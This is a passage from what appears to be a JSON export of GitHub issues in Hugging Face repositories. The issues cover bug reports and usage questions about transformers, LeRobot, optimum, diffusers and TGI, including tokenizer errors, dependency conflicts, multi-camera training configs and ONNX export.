"closed", "labels": [ "Stale" ], "created_at": "2025-08-01T16:39:52Z", "updated_at": "2026-01-03T02:51:13Z", "comments": 2, "user": "botan-r" }, { "repo": "huggingface/transformers", "number": 39842, "title": "Expected behavior of `compute_result` is hard to expect and inconsistent", "body": "In trainer there exists a parameter `compute_result` given to `compute_metrics` when `batch_eval_metrics` is given to True.\n\nhttps://github.com/huggingface/transformers/blob/1e0665a191f73f6b002209c3dfcda478baac6bac/src/transformers/trainer.py#L370-L375\n\nI think there are several problems for `compute_result`,\n1. User can't expect (1) what happen if `batch_eval_metrics` is given (2) what is given to `compute_result` and when it change from True or False (3) what's HF's intention to implement `compute_metrics` with `compute_result`. since there are very few (only 3 line) instruction for this.\n2. `compute_metrics` sometimes called with `compute_result` and sometimes not, EVEN WHEN `batch_eval_metrics` is present. See below lines. \n\nhttps://github.com/huggingface/transformers/blob/1e0665a191f73f6b002209c3dfcda478baac6bac/src/transformers/trainer.py#L4534-L4547\n\nCreating this issue because I spend long time figuring out this.", "url": "https://github.com/huggingface/transformers/issues/39842", "state": "closed", "labels": [], "created_at": "2025-08-01T11:43:28Z", "updated_at": "2025-10-04T08:02:41Z", "comments": 3, "user": "MilkClouds" }, { "repo": "huggingface/transformers", "number": 39841, "title": "MistralCommonTokenizer does not match PreTrainedTokenizer", "body": "### System Info\n\non docker\nos: ubuntu 24.04\ntransformers: 4.55.0.dev0\nmistral_common: 1.8.3\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nCommand to lauch container:\n\n```bash\ndocker run --gpus all -p 8000:8000 --ipc=host vllm/vllm-openai:latest --model mistralai/Voxtral-Mini-3B-2507\n```\n\n\n### Expected behavior\n\nThe output will finish in:\n\n```bash\nvllm-1 | File \"/usr/local/lib/python3.12/dist-packages/vllm/transformers_utils/tokenizer_group.py\", line 24, in __init__ \nvllm-1 | self.tokenizer = get_tokenizer(self.tokenizer_id, **tokenizer_config)\nvllm-1 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm-1 | File \"/usr/local/lib/python3.12/dist-packages/vllm/transformers_utils/tokenizer.py\", line 309, in get_tokenizer\nvllm-1 | tokenizer = get_cached_tokenizer(tokenizer)\nvllm-1 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm-1 | File \"/usr/local/lib/python3.12/dist-packages/vllm/transformers_utils/tokenizer.py\", line 104, in get_cached_tokenizer\nvllm-1 | tokenizer_all_special_tokens = tokenizer.all_special_tokens\nvllm-1 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm-1 | AttributeError: 'MistralCommonTokenizer' object has no attribute 'all_special_tokens'. Did you mean: '_all_special_ids'?\n```\n\nvLLM docker server uses the pretrained tokenizer format:\nhttps://github.com/vllm-project/vllm/blob/49314869887e169be080201ab8bcda14e745c080/vllm/transformers_utils/tokenizer.py#L97-L101\n\nWhich must include: `all_special_ids`, `all_special_tokens`, `all_special_tokens_extended` default properties. However, MistralCommonTokenizer does not have implemented them. 
Is there a plan to standardize both tokenizers?\n", "url": "https://github.com/huggingface/transformers/issues/39841", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-01T09:16:24Z", "updated_at": "2025-11-23T08:03:33Z", "comments": 3, "user": "Fhrozen" }, { "repo": "huggingface/transformers", "number": 39839, "title": "pack_image_features RuntimeError when vision_feature_select_strategy=\"full\"", "body": "### System Info\n\ntransformers 4.54.0\n\n### Who can help?\n\n@zucchini-nlp \n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```\nfrom transformers.models.llava_next import LlavaNextForConditionalGeneration, LlavaNextProcessor\nfrom PIL import Image\nimport requests\nimport torch\n\nmodel = LlavaNextForConditionalGeneration.from_pretrained(\n \"llava-hf/llava-v1.6-vicuna-7b-hf\", \n vision_feature_select_strategy=\"full\",\n torch_dtype=torch.float16,\n device_map=\"auto\",\n )\nprocessor = LlavaNextProcessor.from_pretrained(\"llava-hf/llava-v1.6-vicuna-7b-hf\")\n\nimage = Image.open(\"/data/coco/train2017/000000000009.jpg\")\nprompt = \"USER: \\nWhat is shown in this image? ASSISTANT:\"\ninputs = processor(images=image, text=prompt, truncation=True, return_tensors=\"pt\", vision_feature_select_strategy = \"full\").to(\"cuda\")\n\ninput_embeds = model(inputs.input_ids, pixel_values=inputs.pixel_values, image_sizes=inputs.image_sizes, vision_feature_select_strategy=\"full\")\n```\n\n### Expected behavior\n\nI encountered a bug when running the line \n`input_embeds = model(inputs.input_ids, pixel_values=inputs.pixel_values, image_sizes=inputs.image_sizes, vision_feature_select_strategy=\"full\")`\nI got:\n```\n in pack_image_features\n image_feature = image_feature.view(num_patch_height, num_patch_width, height, width, -1)\nRuntimeError: shape '[2, 2, 24, 24, -1]' is invalid for input of size 9453568\n```\n\n\nThe shape of image_feature is currently [4, 577, 4096]; I want to know how to fix this.", "url": "https://github.com/huggingface/transformers/issues/39839", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-01T07:55:40Z", "updated_at": "2025-09-08T08:02:56Z", "comments": 2, "user": "llnnnnnn" }, { "repo": "huggingface/gsplat.js", "number": 117, "title": "How to generate a mesh?", "body": "I need a scene that mixes Gaussian splatting with mesh geometry, and I don't know whether gsplat can generate a mesh or not.", "url": "https://github.com/huggingface/gsplat.js/issues/117", "state": "open", "labels": [], "created_at": "2025-08-01T03:29:22Z", "updated_at": "2025-08-01T03:29:22Z", "user": "ZXStudio" }, { "repo": "huggingface/diffusers", "number": 12038, "title": "Dataset structure for train_text_to_image_lora.py", "body": "Hello. 
I am trying to use **train_text_to_image_lora.py** script following the instructions https://github.com/huggingface/diffusers/tree/main/examples/text_to_image\n\nI get errors on data structure and don't know what is the issue on my side.\nI have a folder **data** where I have folder **image** and **csv** file.\n\nC:/Users/XXX//data/\n\n\u251c\u2500\u2500 images/\n\u2502 \u251c\u2500\u2500 image1.jpg\n\u2502 \u251c\u2500\u2500 image2.jpg\n\u2502 \u2514\u2500\u2500 ...\n\u2514\u2500\u2500 captions.csv\n\n**Image** folder contain images and **csv** file contains two columns (image names and captions)\n\nimage, caption\nimage1.jpg, A dragon flying through fire\nimage2.jpg, A knight in shining armor\n\nPlease can you let me know how I should organize my dataset to be able to run the training.\n", "url": "https://github.com/huggingface/diffusers/issues/12038", "state": "open", "labels": [], "created_at": "2025-07-31T16:10:38Z", "updated_at": "2025-08-01T16:44:48Z", "comments": 1, "user": "HripsimeS" }, { "repo": "huggingface/lerobot", "number": 1632, "title": "Are there plans to support distributed training?", "body": "[train.py](https://github.com/huggingface/lerobot/blob/main/src/lerobot/scripts/train.py) currently only supports single-GPU training. Is there a plan to support distributed training in the future?", "url": "https://github.com/huggingface/lerobot/issues/1632", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-31T03:31:46Z", "updated_at": "2025-10-17T12:10:40Z", "user": "Hukongtao" }, { "repo": "huggingface/candle", "number": 3039, "title": "Request support for Qwen2.5-vl or Fast-VLM", "body": "I'm trying to call some image-to-text visual models using candle, if anyone knows how to use Qwen2.5-vl or Fast-VLM, can you share it? Appreciate", "url": "https://github.com/huggingface/candle/issues/3039", "state": "open", "labels": [], "created_at": "2025-07-31T02:41:33Z", "updated_at": "2025-08-04T12:21:35Z", "comments": 1, "user": "826327700" }, { "repo": "huggingface/transformers", "number": 39801, "title": "ValueError: This model does not support cache_implementation='static'. Please check the following issue: https://github.com/huggingface/transformers/issues/28981", "body": "### System Info\n\n_prepare_cache_for_generation\n raise ValueError(\nValueError: This model does not support cache_implementation='static'. Please check the following issue: https://github.com/huggingface/transformers/issues/28981\n\nI got this error and i have no clue of how to solve it. I tried different implementations from different people and I always have the same problem.\n\nI used this code: https://mer.vin/2024/11/finetune-llama-3-2-vision-radiology-images/\n\n\nimport os\nfrom unsloth import FastVisionModel\nimport torch\nfrom datasets import load_dataset\nfrom transformers import TextStreamer\nfrom unsloth import is_bf16_supported\nfrom unsloth.trainer import UnslothVisionDataCollator\nfrom trl import SFTTrainer, SFTConfig\n\n# 1. Load the model\n\nmodel, tokenizer = FastVisionModel.from_pretrained(\n \"unsloth/Llama-3.2-11B-Vision-Instruct\",\n load_in_4bit = True,\n use_gradient_checkpointing = \"unsloth\",\n)\n\nmodel = FastVisionModel.get_peft_model(\n model,\n finetune_vision_layers = True,\n finetune_language_layers = True,\n finetune_attention_modules = True,\n finetune_mlp_modules = True,\n r = 16,\n lora_alpha = 16,\n lora_dropout = 0,\n bias = \"none\",\n random_state = 3407,\n use_rslora = False,\n loftq_config = None,\n)\n\n# 2. 
Load the dataset\n\ndataset = load_dataset(\"unsloth/Radiology_mini\", split = \"train\")\ninstruction = \"You are an expert radiographer. Describe accurately what you see in this image.\"\n\ndef convert_to_conversation(sample):\n conversation = [\n { \"role\": \"user\",\n \"content\" : [\n {\"type\" : \"text\", \"text\" : instruction},\n {\"type\" : \"image\", \"image\" : sample[\"image\"]} ]\n },\n { \"role\" : \"assistant\",\n \"content\" : [\n {\"type\" : \"text\", \"text\" : sample[\"caption\"]} ]\n },\n ]\n return { \"messages\" : conversation }\npass\n\nconverted_dataset = [convert_to_conversation(sample) for sample in dataset]\n\n# 3. Before training\n\nFastVisionModel.for_inference(model)\nimage = dataset[0][\"image\"]\ninstruction = \"You are an expert radiographer. Describe accurately what you see in this image.\"\n\nmessages = [\n {\"role\": \"user\", \"content\": [\n {\"type\": \"image\"},\n {\"type\": \"text\", \"text\": instruction}\n ]}\n]\ninput_text = tokenizer.apply_chat_template(messages, add_generation_prompt = True)\ninputs = tokenizer(\n image,\n input_text,\n add_special_tokens = False,\n return_tensors = \"pt\",\n).to(\"cuda\")\n\nprint(\"\\nBefore training:\\n\")\n\ntext_streamer = TextStreamer(tokenizer, skip_prompt = True)\n_ = model.generate(**inputs, streamer = text_streamer, max_new_tokens = 128,\n use_cache = True, temperature = 1.5, min_p = 0.1)\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\npip install unsloth\nexport HF_TOKEN=xxxxxxxxxxxxx\n\n### Expected behavior\n\nStart fine-tuning", "url": "https://github.com/huggingface/transformers/issues/39801", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-30T20:59:45Z", "updated_at": "2025-09-07T08:02:42Z", "comments": 2, "user": "jpitalopez" }, { "repo": "huggingface/lerobot", "number": 1631, "title": "\ud83e\udd5a Filtering Eggs on Moving Table: Dirt/Breakage Detection Feasibility", "body": "Hi \ud83d\udc4b\n\nThanks a lot for your work on lerobot!\n\nI am exploring the use of lerobot to filter eggs based on dirt or breakage while they move past the robot on a conveyor table. The goal is to detect anomalies in real time and eventually eject faulty eggs.\n\nSome specific questions I have:\n\n* Do you have any advice or feedback on using lerobot in this kind of setup?\n* Are there known pros/cons with fast-moving objects and image-based anomaly detection?\n* Would it make sense to multiply robots along the line (e.g., several cameras/models at different angles or points)?\n* Is there support or a best practice for triggering actions (e.g. pneumatic ejection) once a faulty egg is detected?\n\nI am happy to fine-tune a model or adapt an existing one if that\u2019s viable. 
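On the triggering question specifically, a common pattern is to decouple detection from actuation. A minimal hypothetical sketch (the camera index, classifier, conveyor timing, and valve interface are all assumptions, not LeRobot APIs):

```python
import time
import cv2

def is_faulty(frame) -> bool:
    # Placeholder for the dirt/breakage classifier (e.g. a fine-tuned vision model).
    return False

def fire_ejector(channel: int) -> None:
    # Placeholder for the pneumatic-valve interface (PLC, GPIO, etc.).
    print(f"eject: channel {channel}")

TRAVEL_TIME_S = 0.35  # assumed time for an egg to move from camera to ejector

cap = cv2.VideoCapture(0)
while cap.isOpened():
    ok, frame = cap.read()
    if not ok:
        break
    if is_faulty(frame):
        time.sleep(TRAVEL_TIME_S)  # crude; a real line would track encoder ticks
        fire_ejector(channel=0)
```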
\n\nAny insights would be super helpful \ud83d\ude4f\n\nThanks again!", "url": "https://github.com/huggingface/lerobot/issues/1631", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-30T18:35:12Z", "updated_at": "2025-08-12T09:07:41Z", "user": "KannarFr" }, { "repo": "huggingface/optimum", "number": 2330, "title": "Patch Release to support `transformers~=4.53`", "body": "### System Info\n\n```shell\noptimum[onnxruntime-gpu]==1.26.1\ntorch==2.7.1\nvllm==0.10.0\n\ndocker run --rm -it --platform linux/amd64 ghcr.io/astral-sh/uv:debian bash\n```\n\n### Who can help?\n\n@JingyaHuang @echarlaix\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nThe latest release is more than 1 month old. It supports `transformers>=4.36,<4.53.0` with `onnxruntime-gpu` extra. This is incompatible with `vllm==0.10.0`, which requires `transformers>=4.53.2`. `vllm==0.10.0` is required to use with `torch==2.7.1`. My system is required to use `torch==2.7.1` due to the medium CVE in previous versions.\nhttps://nvd.nist.gov/vuln/detail/CVE-2025-2953\n\nIn the current main branch, the requirements has been changed to `transformers>=4.36,<4.54.0`, which would mitigate the issue.\n\nIs it possible to create a patch release based on the current main branch?\n\n```bash\n> uv pip compile <(echo \"optimum[onnxruntime-gpu]>=1.23\"; echo \"vllm>=0.10\")\n x No solution found when resolving dependencies:\n `-> Because only the following versions of optimum[onnxruntime-gpu] are available:\n optimum[onnxruntime-gpu]<=1.23.0\n optimum[onnxruntime-gpu]==1.23.1\n optimum[onnxruntime-gpu]==1.23.2\n optimum[onnxruntime-gpu]==1.23.3\n optimum[onnxruntime-gpu]==1.24.0\n optimum[onnxruntime-gpu]==1.25.0\n optimum[onnxruntime-gpu]==1.25.1\n optimum[onnxruntime-gpu]==1.25.2\n optimum[onnxruntime-gpu]==1.25.3\n optimum[onnxruntime-gpu]==1.26.0\n optimum[onnxruntime-gpu]==1.26.1\n and optimum[onnxruntime-gpu]>=1.23.0,<=1.23.2 depends on transformers<4.46.0, we can conclude that optimum[onnxruntime-gpu]>=1.23.0,<1.23.1\n depends on transformers<4.46.0.\n And because optimum[onnxruntime-gpu]>=1.23.1,<=1.23.2 depends on transformers<4.46.0 and transformers<4.46.0, we can conclude that\n optimum[onnxruntime-gpu]>=1.23.0,<1.23.3 depends on transformers<4.46.0.\n And because optimum[onnxruntime-gpu]==1.23.3 depends on transformers<4.47.0 and transformers>=4.36,<4.49.0, we can conclude that\n optimum[onnxruntime-gpu]>=1.23.0,<1.25.0 depends on transformers<4.49.0.\n And because optimum[onnxruntime-gpu]>=1.25.0,<=1.25.3 depends on transformers>=4.36,<4.52.0 and transformers>=4.36,<4.52.0, we can conclude that\n optimum[onnxruntime-gpu]>=1.23.0,<1.25.2 depends on transformers<4.52.0.\n And because optimum[onnxruntime-gpu]>=1.25.2,<=1.25.3 depends on transformers>=4.36,<4.52.0 and transformers>=4.36,<4.52.0, we can conclude that\n optimum[onnxruntime-gpu]>=1.23.0,<1.26.0 depends on transformers<4.52.0.\n And because optimum[onnxruntime-gpu]>=1.26.0 depends on transformers>=4.36,<4.53.0 and transformers>=4.36,<4.53.0, we can conclude that\n optimum[onnxruntime-gpu]>=1.23.0 depends on transformers<4.53.0.\n And because vllm==0.10.0 depends on transformers>=4.53.2 and only vllm<=0.10.0 is available, we can conclude that vllm>=0.10.0 and\n optimum[onnxruntime-gpu]>=1.23.0 are 
incompatible.\n And because you require optimum[onnxruntime-gpu]>=1.23 and vllm>=0.10.0, we can conclude that your requirements are unsatisfiable.\n```\n\n### Expected behavior\n\nAble to install `optimum[onnxruntime-gpu]>=1.26` and `vllm>=0.10.0`.\n```bash\n> uv pip compile <(echo \"optimum[onnxruntime-gpu] @ git+https://github.com/huggingface/optimum@689c0b5d38aabe265ab1eb334a6ca5bc3ca3574d\"; echo \"vllm>=0.10\")\nResolved 152 packages in 359ms\n# This file was autogenerated by uv via the following command:\n# uv pip compile /dev/fd/63\naiohappyeyeballs==2.6.1\n # via aiohttp\naiohttp==3.12.15\n # via\n # fsspec\n # vllm\naiosignal==1.4.0\n # via aiohttp\nannotated-types==0.7.0\n # via pydantic\nanyio==4.9.0\n # via\n # httpx\n # openai\n # starlette\n # watchfiles\nastor==0.8.1\n # via depyf\nattrs==25.3.0\n # via\n # aiohttp\n # jsonschema\n # referencing\nblake3==1.0.5\n # via vllm\ncachetools==6.1.0\n # via vllm\ncbor2==5.6.5\n # via vllm\ncertifi==2025.7.14\n # via\n # httpcore\n # httpx\n # requests\n # sentry-sdk\ncffi==1.17.1\n # via soundfile\ncharset-normalizer==3.4.2\n # via requests\nclick==8.2.1\n # via\n # ray\n # rich-toolkit\n # typer\n # uvicorn\ncloudpickle==3.1.1\n # via vllm\ncoloredlogs==15.0.1\n # via onnxruntime-gpu\ncompressed-tensors==0.10.2\n # via vllm\ncupy-cuda12x==13.5.1\n # via ray\ndatasets==4.0.0\n # via optimum\ndepyf==0.19.0\n # via vllm\ndill==0.3.8\n # via\n # datasets\n # depyf\n # multiprocess\ndiskcache==5.6.3\n # via vllm\ndistro==1.9.0\n # via openai\ndnspython==2.7.0\n # via email-validator\neinops==0.8.1\n # via vllm\nemail-validator==2.2.0\n # via\n # fastapi\n # pydantic", "url": "https://github.com/huggingface/optimum/issues/2330", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-30T02:40:41Z", "updated_at": "2025-07-31T02:54:31Z", "comments": 1, "user": "yxtay" }, { "repo": "huggingface/lerobot", "number": 1622, "title": "Why is LeRobot\u2019s policy ignoring additional camera streams despite custom `input_features`?", "body": "I'm training a SO101 arm policy with 3 video streams (`front`, `above`, `gripper`) and a state vector. The dataset can be found at this [link](https://huggingface.co/datasets/aaron-ser/SO101-Dataset/tree/main). \n\nI created a custom JSON config (the `train_config.json` below) that explicitly lists the three visual streams under `policy.input_features`, and despite disabling the preset config loading with `\"use_policy_training_preset\": false`, the policy never takes into account any feed that isn't the front observations. Disabling the preset however is not mandatory as previous hackathons with multiple streams such as the [following](https://huggingface.co/LeRobot-worldwide-hackathon/91-AM-PM-smolvla-pouring-liquid/blob/main/train_config.json) used the preset config. \n\nI pass into `lerobot.scripts.train` the `train_config.json` file shared below with the `--config_path` parameter. Although the initial printout of the config is correct with all three streams, after training finishes, the saved `train_config.json` file inside `aaron-ser/SO101-Model` only contains:\n\n**aaron-ser/SO101-Model train_config.json snippet**\n```\n\"input_features\": {\n \"observation.state\": { ... },\n \"observation.images.front\": { ... },\n\"output_features\": { ... }\n```\n\nDropping the `above` and `gripper` streams although the HF dataset includes all three streams and I explicitly passed them in the JSON file. 
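One quick sanity check is to confirm that all three camera keys actually survive dataset loading, independent of the policy config. A hypothetical snippet (the import path follows the public LeRobotDataset interface as I understand it and may differ across versions):

```python
from lerobot.common.datasets.lerobot_dataset import LeRobotDataset  # path may vary by version

ds = LeRobotDataset("aaron-ser/SO101-Dataset")
sample = ds[0]
camera_keys = sorted(k for k in sample if k.startswith("observation.images."))
print(camera_keys)  # expect the above, front, and gripper streams to all be present
```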
\n\nWhat internal step or configuration is overriding my custom `input_features` and keeping only the front camera? How can I ensure LeRobot trains on all provided video streams?\n\n**train_config.json**\n```\n{\n \"dataset\": {\n \"repo_id\": \"aaron-ser/SO101-Dataset\",\n \"root\": null,\n \"episodes\": null,\n \"image_transforms\": {\n \"enable\": false,\n \"max_num_transforms\": 3,\n \"random_order\": false,\n \"tfs\": {\n \"brightness\": {\n \"weight\": 1.0,\n \"type\": \"ColorJitter\",\n \"kwargs\": {\n \"brightness\": [\n 0.8,\n 1.2\n ]\n }\n },\n \"contrast\": {\n \"weight\": 1.0,\n \"type\": \"ColorJitter\",\n \"kwargs\": {\n \"contrast\": [\n 0.8,\n 1.2\n ]\n }\n },\n \"saturation\": {\n \"weight\": 1.0,\n \"type\": \"ColorJitter\",\n \"kwargs\": {\n \"saturation\": [\n 0.5,\n 1.5\n ]\n }\n },\n \"hue\": {\n \"weight\": 1.0,\n \"type\": \"ColorJitter\",\n \"kwargs\": {\n \"hue\": [\n -0.05,\n 0.05\n ]\n }\n },\n \"sharpness\": {\n \"weight\": 1.0,\n \"type\": \"SharpnessJitter\",\n \"kwargs\": {\n \"sharpness\": [\n 0.5,\n 1.5\n ]\n }\n }\n }\n },\n \"revision\": null,\n \"use_imagenet_stats\": true,\n \"video_backend\": \"torchcodec\"\n },\n \"env\": null,\n \"policy\": {\n \"type\": \"act\",\n \"n_obs_steps\": 1,\n \"normalization_mapping\": {\n \"VISUAL\": \"MEAN_STD\",\n \"STATE\": \"MEAN_STD\",\n \"ACTION\": \"MEAN_STD\"\n },\n \"input_features\": {\n \"observation.state\": {\n \"type\": \"STATE\",\n \"shape\": [\n 6\n ]\n },\n \"observation.images.front\": {\n \"type\": \"VISUAL\",\n \"shape\": [\n 3,\n 720,\n 1280\n ]\n },\n \"observation.images.above\": {\n \"type\": \"VISUAL\",\n \"shape\": [\n 3,\n 720,\n 1280\n ]\n },\n \"observation.images.gripper\": {\n \"type\": \"VISUAL\",\n \"shape\": [\n 3,\n 720,\n 1280\n ]\n }\n },\n \"output_features\": {\n \"action\": {\n \"type\": \"ACTION\",\n \"shape\": [\n 6\n ]\n }\n },\n \"device\": \"cuda\",\n \"use_amp\": false,\n \"push_to_hub\": true,\n \"repo_id\": \"aaron-ser/SO101-Model\",\n \"private\": null,\n \"tags\": null,\n \"license\": null,\n ", "url": "https://github.com/huggingface/lerobot/issues/1622", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-29T14:07:14Z", "updated_at": "2025-09-23T14:01:54Z", "user": "Aaron-Serpilin" }, { "repo": "huggingface/trl", "number": 3797, "title": "How to view the training parameters after training is completed", "body": "How to view the training parameters after training is completed\uff1fI am using GRPOTrainer for training, but after training multiple times, I have forgotten the parameters I set. How can I view the saved training parameters?", "url": "https://github.com/huggingface/trl/issues/3797", "state": "open", "labels": [ "\u2753 question", "\ud83c\udfcb GRPO" ], "created_at": "2025-07-29T09:42:52Z", "updated_at": "2025-07-29T13:07:50Z", "user": "Tuziking" }, { "repo": "huggingface/optimum", "number": 2329, "title": "Support for exporting paligemma to onnx", "body": "### Feature request\n\nI\u2019ve tried to export google/paligemma-3b-mix-224 to onnx using optimum. But it outputs: \"ValueError: Trying to export a paligemma model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as custom_onnx_configs. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. 
Please open an \nissue at https://github.com/huggingface/optimum/issues if you would like the model type paligemma to be supported natively in the ONNX export.\"\n\n### Motivation\n\nI\u2019ve tried everything but nothing works =(\n(Using custom configs, using torch.onnx.export, etc)\n\n### Your contribution\n\nActually, it seems to me that I can\u2019t help\u2026 =(", "url": "https://github.com/huggingface/optimum/issues/2329", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-07-29T08:58:41Z", "updated_at": "2025-09-06T02:04:25Z", "comments": 2, "user": "DashaMed555" }, { "repo": "huggingface/transformers", "number": 39744, "title": "_supports_static_cache disappear", "body": "### System Info\n\ntransformers main branch\n\n### Who can help?\n\n@ArthurZucker \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nI see the attr `_supports_static_cache` disappeared in the model. I used to check if `model._supports_static_cache` before setting `cache_implementation=True`. For now, can I assume all models support static cache?\n\n### Expected behavior\n\nAll models support static cache as `_supports_static_cache` is deprecated. Or do we have other method to check if the model support static cache?", "url": "https://github.com/huggingface/transformers/issues/39744", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-29T02:36:04Z", "updated_at": "2025-07-29T08:17:00Z", "comments": 4, "user": "jiqing-feng" }, { "repo": "huggingface/lerobot", "number": 1607, "title": "how to control a so-101 with trained ACT model?", "body": "https://huggingface.co/initie/test_pick_result \nThis is my pre-trained model for grabbing the switch on the desk by ACT model.\nHow to run this policy model on the Anaconda?\nAlready by way of example, \n\npython -m lerobot.record --robot.type=so101_follower \n--robot.port=COM3 \n--robot.id=ammd_follower_arm \n--robot.cameras=\"{ front: {type: opencv, index_or_path: 0, width: 640, height: 480, fps: 30}, side: {type: opencv, index_or_path: 1, width: 640, height: 480, fps: 30} }\" \n--display_data=True \n--dataset.repo_id=\"initie/eval_test_pick\" \n--dataset.single_task=\"Grab the switch\" \n--policy.path=initie/test_pick_result \n--teleop.type=so101_leader --teleop.port=COM5 \n--teleop.id=ammd_leader_arm --dataset.reset_time_s=5\n\nThis is the example code from Lerobot tutorial, but when i run these codes, I had to record 10 episodes again.\nI just wanna run a pre-trained model, not record an episode again. I'm curious about a simple code that only \"runs\" that model not including recording", "url": "https://github.com/huggingface/lerobot/issues/1607", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-28T05:23:24Z", "updated_at": "2025-10-15T03:28:50Z", "user": "initia1013" }, { "repo": "huggingface/lerobot", "number": 1602, "title": "How to perform multi-GPU training for SMoVLA?", "body": "I noticed that the paper used 4 GPUs for pretraining, but the current training code doesn\u2019t seem to support it. 
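For reference, the usual way to retrofit a single-GPU loop is 🤗 Accelerate. A generic, hypothetical sketch (not lerobot's actual trainer; `policy`, `optimizer`, and `dataloader` stand in for whatever the script already builds):

```python
from accelerate import Accelerator

accelerator = Accelerator()

# Wrap the objects the single-GPU script already creates; prepare()
# handles DDP wrapping, device placement, and sharded dataloading.
policy, optimizer, dataloader = accelerator.prepare(policy, optimizer, dataloader)

policy.train()
for batch in dataloader:
    loss = policy(batch)["loss"]  # hypothetical: assumes the policy returns a loss dict
    accelerator.backward(loss)
    optimizer.step()
    optimizer.zero_grad()
```

Launched with e.g. `accelerate launch --num_processes 4 train.py`.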
Could you provide the corresponding code?", "url": "https://github.com/huggingface/lerobot/issues/1602", "state": "closed", "labels": [], "created_at": "2025-07-27T09:46:04Z", "updated_at": "2025-07-28T08:40:01Z", "user": "QZepHyr" }, { "repo": "huggingface/hmtl", "number": 72, "title": "How to create a website ", "body": "", "url": "https://github.com/huggingface/hmtl/issues/72", "state": "open", "labels": [], "created_at": "2025-07-27T09:30:22Z", "updated_at": "2025-07-27T09:30:22Z", "user": "Chi23-ike" }, { "repo": "huggingface/text-generation-inference", "number": 3304, "title": "using trtllm-build instead of optimum-nvidia for engine building or optimum-nvidia wrong version ?", "body": "\nHello,\n\nI'm experiencing significant issues when trying to use Text Generation Inference (TGI) with TensorRT-LLM as the backend.\n\n**Problem 1: Version Compatibility**\nI cannot use the latest version of TGI due to a known bug (see: https://github.com/huggingface/text-generation-inference/issues/3296).\n\nI'm therefore using version: `ghcr.io/huggingface/text-generation-inference:3.3.4-trtllm`\n\nHowever, this version uses TensorRT-LLM v0.17.0.post1, while the latest optimum-nvidia version ([[v0.1.0b9](https://github.com/huggingface/optimum-nvidia/releases/tag/v0.1.0b9)]) uses TensorRT-LLM 0.16.0.\n\nWhen I try to launch TGI with my engine built using optimum-nvidia, I get the following error:\n```\nroot@5ddf177112d7:/usr/local/tgi/bin# /usr/local/tgi/bin/text-generation-launcher --model-id \"/engines/llama-3.2-3b-instruct-optimum/GPU/engines\" --tokenizer-name \"/models/llama-3.2-3b-instruct\" --executor-worker \"/usr/local/tgi/bin/executorWorker\"\n2025-07-27T06:16:40.717109Z INFO text_generation_backends_trtllm: backends/trtllm/src/main.rs:293: Successfully retrieved tokenizer /models/llama-3.2-3b-instruct\n[2025-07-27 06:16:40.717] [info] [ffi.hpp:164] Initializing TGI - TensoRT-LLM Backend (v0.17.0.post1)\n[2025-07-27 06:16:40.747] [info] [ffi.hpp:173] [FFI] Detected 1 Nvidia GPU(s)\n[2025-07-27 06:16:40.758] [info] [backend.cpp:22] Detected single engine deployment, using leader mode\n[TensorRT-LLM][INFO] Engine version 0.16.0 found in the config file, assuming engine(s) built by new builder API.\n[TensorRT-LLM][INFO] Initializing MPI with thread mode 3\n[TensorRT-LLM][INFO] Initialized MPI\n[TensorRT-LLM][INFO] Refreshed the MPI local session\n[TensorRT-LLM][INFO] MPI size: 1, MPI local size: 1, rank: 0\n[TensorRT-LLM][INFO] Rank 0 is using GPU 0\n[TensorRT-LLM][INFO] TRTGptModel maxNumSequences: 64\n[TensorRT-LLM][INFO] TRTGptModel maxBatchSize: 64\n[TensorRT-LLM][INFO] TRTGptModel maxBeamWidth: 1\n[TensorRT-LLM][INFO] TRTGptModel maxSequenceLen: 4096\n[TensorRT-LLM][INFO] TRTGptModel maxDraftLen: 0\n[TensorRT-LLM][INFO] TRTGptModel mMaxAttentionWindowSize: (4096) * 28\n[TensorRT-LLM][INFO] TRTGptModel enableTrtOverlap: 0\n[TensorRT-LLM][INFO] TRTGptModel normalizeLogProbs: 1\n[TensorRT-LLM][INFO] TRTGptModel maxNumTokens: 262144\n[TensorRT-LLM][INFO] TRTGptModel maxInputLen: 4095 = maxSequenceLen - 1 since chunked context is enabled\n[TensorRT-LLM][INFO] TRTGptModel If model type is encoder, maxInputLen would be reset in trtEncoderModel to maxInputLen: 4096 = maxSequenceLen.\n[TensorRT-LLM][INFO] Capacity Scheduler Policy: MAX_UTILIZATION\n[TensorRT-LLM][INFO] Context 